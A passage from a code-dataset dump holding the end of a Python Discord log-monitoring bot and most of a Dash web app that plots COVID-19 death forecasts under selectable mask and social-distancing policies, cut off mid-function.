is a limitation in the size of\n # Discord messages - they can be at most 2000 characters long (and we\n # send some extra characters before the error log).\n if len(std_err) > DISCORD_MAX_MESSAGE_LENGTH:\n pos = std_err.find(\"\\n\", -DISCORD_MAX_MESSAGE_LENGTH)\n std_err = std_err[pos+1:]\n await send_msg(client, \"Error(s) preview:\\n{}\".format(std_err), force_notify=True)\n return\n\n # If there are any critical or severe errors. upload the whole log file.\n if 'Critical' in std_out or 'Severe' in std_out or 'panic' in std_out:\n upload_name = \"{}-{}-{}-{}-{}:{}:{}.log\".format(CONTAINER_NAME, time.year, time.month, time.day, time.hour, time.minute, time.second)\n await send_msg(client, \"Critical or Severe error found in log!\", file=discord.File(io.BytesIO(std_out.encode()), filename=upload_name), force_notify=True)\n return\n\n # No critical or severe errors, return a heartbeat type message\n pretty_before = time.strftime(\"%I:%M%p\")\n pretty_now = now.strftime(\"%I:%M%p\")\n await send_msg(client, \"No critical or severe warnings in log from `{}` to `{}`\".format(pretty_before, pretty_now))\n\n\nclient.run(bot_token)\n","sub_path":"setup-scripts/log-checker.py","file_name":"log-checker.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"468936032","text":"# Import required libraries\nimport os\nimport pickle\nimport copy\nimport datetime as dt\nimport math\n\nimport requests\nimport pandas as pd\nfrom flask import Flask\nimport dash\nimport dash_daq as daq\nimport dash_table\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport plotly.graph_objs as go\nimport dash_dangerously_set_inner_html\nimport numpy as np\nimport os\nfrom os import path\n\nfrom model.base_model import *\n\n \nexternal_styles = [\n{\n \"href\": \"https://fonts.googleapis.com/css2?family=Open+Sans+Condensed:ital,wght@0,300;0,700;1,300&display=swap\",\n \"rel\": \"stylesheet\"\n},\n\n{\n \"href\": \"https://fonts.googleapis.com/css2?family=Noto+Sans+JP:wght@100;300;400;500;700;900&display=swap\",\n \"rel\": \"stylesheet\"\n},\n\n{\n \"href\": \"https://fonts.googleapis.com/css2?family=Ubuntu&display=swap\",\n \"rel\": \"stylesheet\"\n}\n\n]\n\napp = dash.Dash(__name__, external_stylesheets=external_styles)\nserver = app.server\napp.title = \"COVID-19 PIP\"\n\nPOP_UP = app.get_asset_url(\"transparent_PIP_logo.png\") \n\n# Define theme color codes\n\nLIGHT_PINK = \"#FF60AA\"\nDARK_GRAY = \"#323232\"\nGRAY = \"#808080\"\nCYAN = \"#95E3FA\"\n\nPURPLE_COLOR = \"#AF1CF7\"\nDARK_PINK = \"#CA1A57\"\n\n#-------------------------------------------------------\n'''\nHelper functions for style formating and data processing\n\nList of helper functions >>\n---------------------------\n_get_input_HTML_format :: returns cell formating for \n html/dcc numerical input \n\n_get_radioItems_HTML_format :: returns a radio items \n list for display\n'''\n#-------------------------------------------------------\n\n# TO DO: Attack rate plot\n\n'''\nCOUNTRIES = [\"United States\", \"United Kingdom\", \"Italy\", \"Germany\", \"Spain\", \n \"Australia\", \"Brazil\", \"Canada\", \"Sweden\", \"Norway\", \"Finland\", \n \"Estonia\", \"Egypt\", \"Japan\", \"Croatia\"]\n'''\n\nCOUNTRIES = [\"United States\", \"United Kingdom\", \"Italy\", \"Germany\", \"Brazil\", \"Japan\", \"Egypt\"]\n\n# load models and data for all countries \n\nif path.exists(os.getcwd() + \"\\\\PIPmodels\\\\global_models\"):\n\n global_models = pickle.load(open(os.getcwd() + \"\\\\PIPmodels\\\\global_models\", 'rb'))\n\nelse:\n\n global_models = dict.fromkeys(COUNTRIES)\n\n for country in COUNTRIES:\n\n global_models[country] = pickle.load(open(os.getcwd() + \"\\\\2020-08-25\\\\models\\\\\" + country, 'rb'))\n\n pickle.dump(global_models, open(os.getcwd() + \"\\\\PIPmodels\\\\global_models\", 'wb'))\n\nif path.exists(os.getcwd() + \"\\\\PIPmodels\\\\country_data\"+\"_\"+str(dt.date.today())):\n\n country_data = pickle.load(open(os.getcwd() + \"\\\\PIPmodels\\\\country_data\"+\"_\"+str(dt.date.today()), 'rb'))\n\nelse:\n\n country_data = get_COVID_DELVE_data(COUNTRIES)\n\n pickle.dump(country_data, open(os.getcwd() + \"\\\\PIPmodels\\\\country_data\", 'wb'))\n\n \nif path.exists(os.getcwd() + \"\\\\PIPmodels\\\\projections\"+\"_\"+str(dt.date.today())):\n\n global_projections = pickle.load(open(os.getcwd() + \"\\\\PIPmodels\\\\projections\"+\"_\"+str(dt.date.today()), 'rb'))\n\nelse:\n\n global_projections = dict.fromkeys(COUNTRIES)\n\n for country in COUNTRIES:\n\n global_projections[country] = pickle.load(open(os.getcwd() + \"\\\\2020-08-25\\\\projections\\\\\" + country, 'rb'))\n\n pickle.dump(global_models, open(os.getcwd() + \"\\\\PIPmodels\\\\global_projections\", 'wb'))\n\n\nTARGETS = [\"Daily Deaths\", \"Cumulative Deaths\", \"Reproduction Number\"]\n\nCOUNTRY_LIST = [{'label': COUNTRIES[k], 'value': COUNTRIES[k], \"style\":{\"margin-top\":\"-.3em\", \"align\": \"center\"}} for k in range(len(COUNTRIES))]\n\nTARGET_LIST = [{'label': TARGETS[k], 'value': k, \"style\":{\"margin-top\":\"-.3em\", \"align\": \"center\"}} for k in range(len(TARGETS))]\n\n\nBOX_SHADOW = \"1px 2px 3px 4px #ccc\" \nMARGIN_INPUT = \"20px\"\nPANEL_COLOR = \"#FBF8F8\"\n\nTITLE_STYLE = {\"marginBottom\": \".25em\", \"margin-top\": \"1em\", \"margin-left\": MARGIN_INPUT, \"color\":DARK_GRAY, \"font-weight\": \"bold\", \n \"font-size\": \"12\", \"font-family\": \"Noto Sans JP\"}\nSUBTITLE_STYLE = {\"color\":DARK_PINK, \"font-size\": 13}\nSUBTITLE_STYLE_ = {\"margin-top\":\"10px\", \"color\":DARK_PINK, \"font-size\": 13}\nPANEL_TEXT_STYLE = {\"marginBottom\": \".25em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT, \"color\":GRAY, \"font-size\": \"11px\", \n \"font-style\": \"italic\", \"font-family\":\"Noto Sans JP\"}\nPANEL_TEXT_STYLE2 = {\"marginBottom\": \".25em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT, \"color\":GRAY, \"font-size\": \"12px\", \n \"font-family\":\"Noto Sans JP\"}\nPANEL_TEXT_STYLE3 = {\"marginBottom\": \".25em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT, \"color\":GRAY, \"font-size\": \"12px\", \n \"font-family\":\"Noto Sans JP\", \"font-weight\":\"bold\"} \nPANEL_TEXT_STYLE4 = {\"marginBottom\": \".25em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT, \"margin-right\": MARGIN_INPUT, \"color\":GRAY, \n \"font-size\": \"12px\", \"font-family\":\"Noto Sans JP\", \"font-weight\":\"bold\"} \nPANEL_TEXT_STYLE_ = {\"marginBottom\": \"0em\", \"margin-top\": \"0em\", \"color\":DARK_GRAY, \"font-size\": \"13px\", \"font-family\":\"Open Sans Condensed\"}\n\nCAPTION_STYLE = {\"color\":\"#4E4646\", \"font-size\": 10}\nBULLET_STYLE_0 = {\"color\":\"#4E4646\", \"text-shadow\":\"#4E4646\", \"background-color\":\"#4E4646\", \"border-radius\": \"10%\", \"font-size\": 10, \"width\":\"7px\", \"margin-right\":\"10px\"}\nBULLET_STYLE_1 = {\"color\":\"#4F27EC\", \"text-shadow\":\"#4F27EC\", \"background-color\":\"#4F27EC\", \"border-radius\": \"10%\", \"font-size\": 10, \"width\":\"7px\", \"margin-right\":\"10px\"}\nBULLET_STYLE_2 = {\"color\":\"#AF1CF7\", \"text-shadow\":\"#AF1CF7\", \"background-color\":\"#AF1CF7\", \"border-radius\": \"10%\", \"font-size\": 10, \"width\":\"7px\", \"margin-right\":\"10px\"}\nBULLET_STYLE_3 = {\"color\":\"#F71C93\", \"text-shadow\":\"#F71C93\", \"background-color\":\"#F71C93\", \"border-radius\": \"10%\", \"font-size\": 10, \"width\":\"7px\", \"margin-right\":\"10px\"}\n\nname_style = dict({\"color\": \"#4E4646\", 'fontSize': 13, \"width\": \"150px\", \"marginBottom\": \".5em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\"})\nname_style_ = dict({\"color\": \"#4E4646\", 'fontSize': 13, \"width\": \"250px\", \"marginBottom\": \".5em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\"})\ninput_style = dict({\"width\": \"100px\", \"height\": \"30px\", \"columnCount\": 1, \"textAlign\": \"center\", \"marginBottom\": \"1em\", \"font-size\":12, \"border-color\":LIGHT_PINK})\nform_style = dict({'width' : '10%', 'margin' : '0 auto'})\nradio_style = dict({\"width\": \"150px\", \"color\": \"#524E4E\", \"columnCount\": 3, \"display\": \"inline-block\", \"font-size\":11, \"border-color\":LIGHT_PINK})\nradio_style_short = dict({\"width\": \"110px\", \"color\": \"#524E4E\", \"columnCount\": 3, \"display\": \"inline-block\", \"font-size\":11})\nradio_style_long = dict({\"width\": \"450px\", \"color\": GRAY, \"columnCount\": 6, \"display\": \"inline-block\", \"font-size\":11, \"font-family\": \"Noto Sans JP\"})\nname_style_long = dict({\"color\": \"#4E4646\", 'fontSize': 13, \"width\": \"450px\", \"columnCount\": 3, \"marginBottom\": \".5em\", \"textAlign\": \"left\"})\nradio_style_her2 = dict({\"width\": \"150px\", \"color\": \"#524E4E\", \"columnCount\": 3, \"display\": \"inline-block\", \"font-size\":11})\nname_style_her2 = dict({\"color\": \"#4E4646\", 'fontSize': 13, \"width\": \"120px\", \"columnCount\": 1, \"marginBottom\": \".5em\", \"textAlign\": \"left\"})\n\n\ndef _get_input_HTML_format(name, ID, name_style, input_range, input_step, placeholder, input_style):\n\n _html_input = html.P(children=[html.Div(name, style=name_style), \n dcc.Input(placeholder=placeholder, type='number', \n min=input_range[0], max=input_range[1], step=input_step, \n style=input_style, id=ID)])\n\n return _html_input\n\n\ndef _get_radioItems_HTML_format(name, ID, name_style, options, radio_style):\n\n _html_radioItem = html.P(children=[html.Div(name, style=name_style), \n dcc.RadioItems(options=options, value=1, style=radio_style, id=ID)])\n\n return _html_radioItem\n\n\ndef _get_toggle_switch(name, name_style, color_style, ID):\n\n _html_toggle = html.P(children=[html.Div(name, style=name_style),\n daq.ToggleSwitch(color=color_style, size=30, value=True, \n label=['No', 'Yes'], style={\"font-size\":9, \"font-family\": \"Noto Sans JP\", \"color\":GRAY}, id=ID)], \n style={\"width\": \"100px\", \"font-size\":9})\n\n return _html_toggle\n\ndef HORIZONTAL_SPACE(space_size):\n \n return dbc.Row(dbc.Col(html.Div(\" \", style={\"marginBottom\": str(space_size) + \"em\"})))\n\ndef VERTICAL_SPACE(space_size):\n\n return dbc.Col(html.Div(\" \"), style={\"width\": str(space_size) + \"px\"})\n\n#-------------------------------------------------------\n'''\nApp layout components\n\nList of layout components >>\n---------------------------\nHEADER :: Logo display and navigation buttons on the app\n header area \n\nPATIENT_INFO_FORM :: form that reads patient information\n to compute and display risk\n'''\n#-------------------------------------------------------\n\n\n# Create the **header** with logo and navigation buttons\n#-------------------------------------------------------\n\nLEARN_BUTTON = html.A(dbc.Button(\"Learn More\", style={\"bgcolor\": \"gray\"}), href=\"https://www.vanderschaar-lab.com/policy-impact-predictor-for-covid-19/\", className=\"two columns\")\nWEBSITE_BUTTON = html.A(dbc.Button(\"Go back to website\", style={\"bgcolor\": \"gray\"}), href=\"https://www.vanderschaar-lab.com/policy-impact-predictor-for-covid-19/\", className=\"two columns\")\nFEEDBACK_BUTTON = html.A(dbc.Button(\"Send Feedback\", style={\"bgcolor\": \"gray\"}), href=\"https://www.vanderschaar-lab.com/contact-us/\", className=\"two columns\")\nGITHUB_BUTTON = html.A(dbc.Button(\"GitHub\", style={\"bgcolor\": \"gray\"}), href=\"https://www.vanderschaar-lab.com/contact-us/\", className=\"two columns\")\nRESET_BUTTON = dbc.Button(\"Reset All\", style={\"bgcolor\": \"gray\"})\n\nHEADER = html.Div([\n\n html.Div(\n [ \n \n dbc.Row([dbc.Col(html.Img(src=app.get_asset_url(\"logo.png\"), id=\"adjutorium-logo\", style={\"height\": \"100px\", 'textAlign': 'left',\n \"width\": \"auto\",})),\n VERTICAL_SPACE(325), \n dbc.Col(LEARN_BUTTON),\n VERTICAL_SPACE(20),\n dbc.Col(WEBSITE_BUTTON),\n VERTICAL_SPACE(20),\n dbc.Col(FEEDBACK_BUTTON), \n VERTICAL_SPACE(20),\n dbc.Col(GITHUB_BUTTON)]), \n \n ], style={\"margin-left\":\"5ex\"}, className=\"header\"),\n\n ],\n\n)\n\n\n# Create the *Patient Information form* for app body\n# -------------------------------------------------- \n\n# Input, name & HTML form styling dictionaries\n\n\nCOUNTRY_DROPMENU = dcc.Dropdown(id='country', options= COUNTRY_LIST, value=\"United Kingdom\", \n placeholder=\" \", style={\"width\":\"150px\", \"height\": \"30px\", \"font-size\": 11, \"border-color\":GRAY, \"color\":GRAY,\n \"font-color\":GRAY, \"margin-top\":\"-.1em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\", \n \"vertical-align\":\"top\", \"display\": \"inline-block\"}) \n\nREGION_DROPMENU = dcc.Dropdown(id='region', options= COUNTRY_LIST, disabled=True, \n placeholder=\" \", style={\"width\":\"150px\", \"height\": \"30px\", \"font-size\": 11, \"border-color\":GRAY, \"color\":GRAY,\n \"font-color\":GRAY, \"margin-top\":\"-.1em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\", \n \"vertical-align\":\"top\", \"display\": \"inline-block\"}) \n\nTARGET_DROPMENU = dcc.Dropdown(id='target', options= TARGET_LIST, value=0, \n placeholder=\" \", style={\"width\":\"150px\", \"height\": \"30px\", \"font-size\": 11, \"border-color\":GRAY, \"color\":GRAY,\n \"font-color\":GRAY, \"margin-top\":\"-.1em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\", \n \"vertical-align\":\"top\", \"display\": \"inline-block\"}) \n\nHORIZON_SLIDER = dcc.Slider(id='horizonslider', marks={7: \"1w\", 30: \"1m\", 60: \"2m\", 90: \"3m\", 120: \"4m\"}, min=7, \n max=120, value=30, step=1, updatemode=\"drag\")\n\n\nMASK_SLIDER = dcc.RadioItems(id='maskslider',\n options=[{'label': 'No policy measures', 'value': 0}, \n {'label': 'Recommended', 'value': 1},\n {'label': 'Limited mandate', 'value': 2},\n {'label': 'Universal', 'value': 3}], value=1, \n labelStyle={\"display\": \"inline-block\", \"font-size\": 11,\n \"font-family\": \"Noto Sans JP\", \"color\":GRAY, \"width\":\"50%\"},\n inputStyle={\"color\":CYAN}) \n\nSOCIAL_DIST_OPT = dcc.Dropdown(options=[{'label': 'Workplace closure', 'value': 0},\n {'label': 'Public events cancellation', 'value': 1},\n {'label': 'Public transport closure', 'value': 2},\n {'label': 'Gatherings restrictions', 'value': 3},\n {'label': 'Shelter-in-place' , 'value': 4},\n {'label': 'Internal movement restrictions' , 'value': 5},\n {'label': 'Travel restrictions' , 'value': 6}],\n style={\"font-size\": 11, \"font-family\": \"Noto Sans JP\", \"color\":GRAY, \"width\":\"300px\", \"height\": \"25px\", \"border-color\":GRAY},\n multi=True) \n\nDISPLAY_LIST_1 = dcc.Checklist(options=[{'label': 'Compare with current policy', 'value': 1}], \n labelStyle={\"font-size\": 11, \"font-family\": \"Noto Sans JP\", \"color\":GRAY, 'display': 'inline-block'}) \n\nDISPLAY_LIST_2 = dcc.Checklist(options=[{'label': 'Show PIP model fit', 'value': 1}],\n labelStyle={\"font-size\": 11, \"font-family\": \"Noto Sans JP\", \"color\":GRAY, 'display': 'inline-block'},\n id=\"pipfit\") \n\n\nDISPLAY_LIST_3 = dcc.Checklist(options=[{'label': 'Confidence Intervals', 'value': 1}], \n value=[1],\n labelStyle={\"font-size\": 11, \"font-family\": \"Noto Sans JP\", \"color\":GRAY, 'display': 'inline-block'},\n id=\"confidenceint\") \n\n\nNum_days = (dt.date.today() - dt.date(2020, 1, 1)).days \nBEGIN_DATE = dcc.Slider(id='dateslider', marks={0: \"Jan 1st, 2020\", Num_days: \"Today\"}, \n min=0, max=Num_days, value=0, step=1, updatemode=\"drag\")\n\nHORIZON_NOTE = \"*w = week, m = month.\" \nREQUEST_NOTE = \"Select a geographical location and the required forecast.\" \nREQUEST_NOTE_2 = \"Select the non-pharmaceutical interventions (NPIs) to be applied in the geographical area selected above.\" \n\nCOUNTRY_SELECT = html.P(children=[html.Div(\"Country\", style=name_style), COUNTRY_DROPMENU])\nREGION_SELECT = html.P(children=[html.Div(\"Region\", style=name_style), REGION_DROPMENU])\nTARGET_SELECT = html.P(children=[html.Div(\"Forecast Target\", style=name_style), TARGET_DROPMENU])\nHORIZON_SELECT = html.P(children=[html.Div(\"Forecast Horizon*\", style=name_style), HORIZON_SLIDER])\nMASK_SELECT = html.P(children=[html.Div(\"Mask Policy\", style=name_style), MASK_SLIDER])\nSOCIAL_SELECT = html.P(children=[html.Div(\"Social Distancing Measures\", style=name_style_), SOCIAL_DIST_OPT])\nBEGIN_SELECT = html.P(children=[html.Div(\"View from\", style=PANEL_TEXT_STYLE4), BEGIN_DATE]) \nSCHOOL_CLOSURE = _get_toggle_switch(name=\"School Closure \", name_style=name_style, color_style=CYAN, ID=\"CT\")\n\n\nPATIENT_INFO_FORM = html.Div(\n [\n\n html.Div(\n [ \n \n dbc.Row(dbc.Col(html.Div(\"Forecast Settings\", style={\"marginBottom\": \"0.5em\", \"margin-top\": \"1em\", \"margin-left\": MARGIN_INPUT, \n \"color\":DARK_GRAY, \"font-weight\": \"bold\", \"font-size\": \"11\", \"font-family\": 'Noto Sans JP'}))),\n dbc.Row(dbc.Col(html.Div(REQUEST_NOTE, style=PANEL_TEXT_STYLE2))),\n HORIZONTAL_SPACE(1),\n dbc.Row(\n [\n dbc.Col(COUNTRY_SELECT), \n VERTICAL_SPACE(40),\n dbc.Col(REGION_SELECT), \n \n ], style={\"margin-left\": \"40px\"}\n ),\n HORIZONTAL_SPACE(1),\n dbc.Row(\n [ dbc.Col(TARGET_SELECT),\n VERTICAL_SPACE(40),\n dbc.Col(HORIZON_SELECT), \n ], style={\"margin-left\": \"40px\"}\n ),\n HORIZONTAL_SPACE(.5),\n dbc.Row([VERTICAL_SPACE(200), dbc.Col(html.Div(HORIZON_NOTE, style=PANEL_TEXT_STYLE))]),\n HORIZONTAL_SPACE(1),\n\n ], style={\"box-shadow\": BOX_SHADOW, \"margin\": MARGIN_INPUT, \"background-color\": PANEL_COLOR, \"width\": \"450px\"}), \n\n html.Div(\n [ \n dbc.Row(dbc.Col(html.Div(\"Policy Scenario\", style={\"marginBottom\": \"1em\", \"margin-top\": \"1em\", \"margin-left\": MARGIN_INPUT,\n \"color\":DARK_GRAY, \"font-weight\": \"bold\", \"font-size\": \"11\", \"font-family\":'Noto Sans JP'}))), \n dbc.Row(dbc.Col(html.Div(REQUEST_NOTE_2, style=PANEL_TEXT_STYLE2))),\n HORIZONTAL_SPACE(1),\n dbc.Row(\n [ \n VERTICAL_SPACE(40),\n dbc.Col(SCHOOL_CLOSURE), \n VERTICAL_SPACE(60),\n dbc.Col(MASK_SELECT),\n ], style={\"margin-left\": MARGIN_INPUT}\n ),\n HORIZONTAL_SPACE(.5),\n dbc.Row(\n [ \n VERTICAL_SPACE(25),\n dbc.Col(SOCIAL_SELECT), \n ], style={\"margin-left\": MARGIN_INPUT}\n ),\n HORIZONTAL_SPACE(2),\n ], style={\"box-shadow\": BOX_SHADOW, \"margin\": MARGIN_INPUT, \"background-color\": PANEL_COLOR, \"width\": \"450px\"}),\n\n ],\n\n)\n\n# Create the results display panel\n\nCAUTION_STATEMENT = \"Disclaimer: PIP uses machine learning to predict the most likely trajectory of COVID-19 deaths based on current knowledge and data, but will not provide 100% accurate predictions. Click on the 'Learn more' button to read our model's assumptions and limitations.\"\n\n\nRESULTS_DISPLAY = html.Div(\n [\n\n html.Div( \n [ \n\n dbc.Row(dbc.Col(html.Div(\"COVID-19 Forecasts\", style=TITLE_STYLE))),\n dbc.Row(dbc.Col(html.Div(CAUTION_STATEMENT, style=PANEL_TEXT_STYLE2))),\n HORIZONTAL_SPACE(.5),\n dbc.Row([dbc.Col(html.Div(\"Display Options\", style=PANEL_TEXT_STYLE3)), VERTICAL_SPACE(10), DISPLAY_LIST_2, VERTICAL_SPACE(10), DISPLAY_LIST_1,\n VERTICAL_SPACE(10), DISPLAY_LIST_3, VERTICAL_SPACE(70), BEGIN_SELECT]), \n HORIZONTAL_SPACE(2),\n dbc.Row(html.Div(dcc.Graph(id=\"covid_19_forecasts\", config={'displayModeBar': False}), style={\"marginBottom\": \".5em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT})), \n HORIZONTAL_SPACE(1.25),\n ], style={\"box-shadow\": BOX_SHADOW, \"margin\": MARGIN_INPUT, \"background-color\": PANEL_COLOR, \"width\": \"800px\"}),\n\n ]\n\n)\n\n#-----------------------------------------------------\n'''\nAPP Layout: contains the app header, the information\nform and the displayed graphs\n'''\n#-----------------------------------------------------\n\n #

\n # Micromodal\n #

\n\npopup = html.Div([\n dash_dangerously_set_inner_html.DangerouslySetInnerHTML('''\n
\n
\n
\n
\n
\n \"image\"\n
\n \n
\n
\n

\n PIP is an online tool that uses machine learning to predict the impact of non-pharmaceutical policy measures on the future trajectory of COVID-19 deaths. The model is designed and trained based on current knowledge and data, and does not provide 100% accurate predictions. Please make sure to discuss the projections of PIP with your local health officials and experts. Visit our website to learn more about our model's assumptions and limitations.\n

\n
\n
\n \n
\n
\n
\n
\n '''),\n]) \n\napp.layout = html.Div([popup, HEADER, html.Div([PATIENT_INFO_FORM, RESULTS_DISPLAY], className=\"row app-center\")])\n \n@app.callback(\n Output(\"covid_19_forecasts\", \"figure\"),\n [Input(\"target\", \"value\"), Input(\"horizonslider\", \"value\"), Input(\"dateslider\", \"value\"), Input(\"maskslider\", \"value\"), Input(\"country\", \"value\"),\n Input(\"pipfit\", \"value\"), Input(\"confidenceint\", \"value\")]) \n\ndef update_risk_score(target, horizonslider, dateslider, maskslider, country, pipfit, confidenceint):\n\n \"\"\"\n Set X and Y axes based on input callbacks\n\n \"\"\"\n\n SHOW_PIP_FIT = False\n SHOW_CONFIDENCE = True\n\n if type(pipfit)==list:\n\n if len(pipfit) > 0:\n\n SHOW_PIP_FIT = True\n\n if type(confidenceint) !=list or len(confidenceint)==0: \n \n SHOW_CONFIDENCE = False \n\n Y_AXIS_NAME = TARGETS[target] \n TODAY_DATE = dt.datetime.today()\n BEGIN_YEAR = dt.datetime(2020, 1, 1)\n DAYS_TILL_TODAY = (TODAY_DATE - BEGIN_YEAR).days\n END_DATE = TODAY_DATE + dt.timedelta(days=horizonslider)\n START_DATE = BEGIN_YEAR + dt.timedelta(days=dateslider)\n DATE_RANGE = pd.date_range(start=START_DATE, end=END_DATE) \n TOTAL_NUM_DAYS = len(DATE_RANGE)\n TRUE_DEATHS_DATES = pd.date_range(start=START_DATE, end=TODAY_DATE)\n FORECAST_DATES = pd.date_range(start=TODAY_DATE + dt.timedelta(days=1), end=END_DATE)\n MAX_HORIZON = 120 \n PLOT_RATIO = 0.2\n\n predictive_model = global_models[country]\n country_DELVE_dat = country_data[country]\n deaths_true = country_DELVE_dat[\"Daily deaths\"]\n NPI_data = country_data[country][\"NPI data\"]\n\n deaths_true[deaths_true < 0] = 0\n deaths_smooth = smooth_curve_1d(deaths_true)\n cumulative_deaths = np.cumsum(deaths_true)\n\n if maskslider==0:\n\n deaths_pred, _, R_t = predictive_model.predict(DAYS_TILL_TODAY + MAX_HORIZON, R0_forecast=1*np.ones(MAX_HORIZON))\n deaths_forecast = deaths_pred[DAYS_TILL_TODAY-1:DAYS_TILL_TODAY + horizonslider-1]\n PIP_MODEL_FIT = deaths_pred[:DAYS_TILL_TODAY-1] \n\n else:\n \n deaths_forecast = global_projections[country][0][DAYS_TILL_TODAY-1:DAYS_TILL_TODAY + horizonslider-1]\n PIP_MODEL_FIT = global_projections[country][0][:DAYS_TILL_TODAY-1] \n \n cum_death_forecast = np.cumsum(deaths_forecast) + np.sum(deaths_true)\n R0_t_forecast = global_projections[country][3][dateslider:DAYS_TILL_TODAY + horizonslider-1]\n deaths_CI_l = global_projections[country][2][:horizonslider]\n deaths_CI_u = global_projections[country][1][:horizonslider] \n\n\n if target==0:\n\n Y_MAX_VAL = np.maximum(np.max(deaths_smooth), np.max(deaths_forecast))\n Y_MAX_VAL = Y_MAX_VAL * (1 + PLOT_RATIO)\n\n elif target==1:\n \n Y_MAX_VAL = np.max(cum_death_forecast) + np.max(deaths_CI_u) \n Y_MAX_VAL = Y_MAX_VAL * (1 + PLOT_RATIO)\n\n elif target==2:\n \n Y_MAX_VAL = 6 \n\n LINE_WIDTH = 2\n LINE_WIDTH_ = 3\n _OPACITY_1 = 0.2\n _OPACITY_2 = 0.3\n _OPACITY_3 = 0.4\n COLOR_1 = (\"#4F27EC\", \"rgba(79, 39, 236, \" + str(_OPACITY_1)+\")\")\n COLOR_2 = (\"#AF1CF7\", \"rgba(175, 28, 247, \" + str(_OPACITY_2)+\")\")\n COLOR_3 = (\"#F5B7B1\", \"rgba(245, 183, 177, \" + str(_OPACITY_3)+\")\") \n\n LINE_STYLE_0 = {\"color\":\"#2C2B2D\", \"width\":LINE_WIDTH, \"dash\": \"dot\"}\n LINE_STYLE_1 = {\"color\":COLOR_1[0], \"width\":LINE_WIDTH}\n LINE_STYLE_2 = {\"color\":COLOR_2[0], \"width\":LINE_WIDTH}\n LINE_STYLE_3 = {\"color\":COLOR_3[0], \"width\":LINE_WIDTH}\n LINE_STYLE_4 = {\"color\":GRAY, \"width\":LINE_WIDTH, \"dash\": \"dot\"}\n\n TRUE_DEATH_STYLE = {\"color\":\"red\", \"opacity\":.25}\n PIP_FIT_STYLE = {\"color\":PURPLE_COLOR, \"symbol\":\"cross\", \"opacity\":.5}\n SMTH_DEATH_STYLE = {\"color\":\"red\", \"width\":LINE_WIDTH, \"dash\": \"dot\"}\n R0_STYLE = {\"color\":PURPLE_COLOR, \"width\":LINE_WIDTH_}\n R0_STYLE_ = {\"color\":PURPLE_COLOR, \"width\":LINE_WIDTH_, \"dash\": \"dot\"}\n FORECAST_STYLE = {\"color\":\"black\", \"width\":LINE_WIDTH_, \"dash\": \"dot\"}\n FORECAST_STYLE_ = {\"color\":COLOR_3[1], \"width\":LINE_WIDTH}\n\n pip_fit_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": PIP_MODEL_FIT[dateslider:], \"mode\":\"markers\", \"marker\":PIP_FIT_STYLE, \n \"name\": \"PIP Model Fit\"}\n\n deaths_true_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": deaths_true[dateslider:], \"mode\":\"markers\", \"marker\":TRUE_DEATH_STYLE, \n \"name\": \"Daily Deaths\"}\n\n death_smooth_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": deaths_smooth[dateslider:], \"mode\":\"lines\", \"line\":SMTH_DEATH_STYLE, \n \"name\": \"7-day Average Deaths\"} \n\n death_frcst_dict = {\"x\":FORECAST_DATES, \"y\": deaths_forecast, \"mode\":\"lines\", \"line\":FORECAST_STYLE, \n \"name\": \"Deaths Forecast\"} \n\n death_frcst_dictu = {\"x\":FORECAST_DATES, \"y\": deaths_CI_u, \"mode\":\"lines\", \"line\":FORECAST_STYLE_, \n \"fill\":\"tonexty\", \"fillcolor\":COLOR_3[1], \"name\": \"Deaths Forecast (Upper)\"} \n\n death_frcst_dictl = {\"x\":FORECAST_DATES, \"y\": deaths_CI_l, \"mode\":\"lines\", \"line\":FORECAST_STYLE_, \n \"name\": \"Deaths Forecast (Lower)\"} \n\n cum_frcst_dictu = {\"x\":FORECAST_DATES, \"y\": np.sum(deaths_true) + np.cumsum(deaths_CI_u), \"mode\":\"lines\", \"line\":FORECAST_STYLE_, \n \"fill\":\"tonexty\", \"fillcolor\":COLOR_3[1], \"name\": \"Cumulative Deaths (Upper)\"} \n\n cum_frcst_dictl = {\"x\":FORECAST_DATES, \"y\": np.sum(deaths_true) + np.cumsum(deaths_CI_l), \"mode\":\"lines\", \"line\":FORECAST_STYLE_, \n \"name\": \"Cumulative Deaths (Lower)\"} \n\n cum_frcst_dict = {\"x\":FORECAST_DATES, \"y\": cum_death_forecast, \"mode\":\"lines\", \"line\":FORECAST_STYLE, \n \"name\": \"Cumulative Deaths Forecast\"} \n\n cum_death_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": cumulative_deaths[dateslider:], \"mode\":\"lines\", \"line\":SMTH_DEATH_STYLE, \n \"name\": \"Cumulative Deaths\"} \n\n R0_frcst_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": R0_t_forecast[dateslider:DAYS_TILL_TODAY], \"mode\":\"lines\", \"line\":R0_STYLE, \n \"name\": \"R0_t\"} \n\n R0_pred_dict = {\"x\":FORECAST_DATES, \"y\": R0_t_forecast[DAYS_TILL_TODAY-1:DAYS_TILL_TODAY + horizonslider-1], \"mode\":\"lines\", \"line\":R0_STYLE_, \n \"name\": \"R0_t\"} \n\n today_line = {\"x\":[dt.date.today() for k in range(int(Y_MAX_VAL))], \"y\": np.linspace(0, int(Y_MAX_VAL), int(Y_MAX_VAL)), \"mode\":\"lines\", \"line\":LINE_STYLE_4, \n \"name\": \"Forecast day\"} \n\n if target==0:\n\n DATA_DICT = [deaths_true_dict, death_smooth_dict, death_frcst_dict]\n\n if SHOW_CONFIDENCE:\n\n DATA_DICT = DATA_DICT + [death_frcst_dictu, death_frcst_dictl]\n\n if SHOW_PIP_FIT:\n\n DATA_DICT = DATA_DICT + [pip_fit_dict]\n\n DATA_DICT = DATA_DICT + [today_line] \n\n elif target==1:\n \n 